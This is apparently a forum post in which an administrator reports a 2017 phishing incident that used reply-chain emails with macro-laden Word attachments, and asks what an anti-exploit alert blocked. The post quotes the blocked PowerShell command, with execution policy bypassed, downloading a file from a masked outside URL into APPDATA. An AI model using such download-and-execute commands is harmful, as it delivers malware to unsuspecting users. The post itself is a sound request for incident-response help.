We have gotten AE alerts before. Usually harmless. However this morning multiple malicious emails came into the organization, all from same sending, and 2 users opened the attachment (word doc). I received alert below:
8/31/2017 7:00:09 AM Computer18 10.10.1.125 Exploit payload process blocked BLOCK C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA + '\pP...
Computer name and url changed.
It looks like the word doc likely had a macro that triggered this but here is the weird thing (and maybe it isn't weird and I just haven't seen it yet). The users here who received emails all received a different email (with bad file attached) that was a reply to previous email conversations. I've not seen that before. The body of each email was the same but was phrased in a way that fooled multiple users, due to language that is pretty spot on for our industry.
Can anyone tell me what this is that was blocked, and if the particular of the email being a reply to a previous email is new?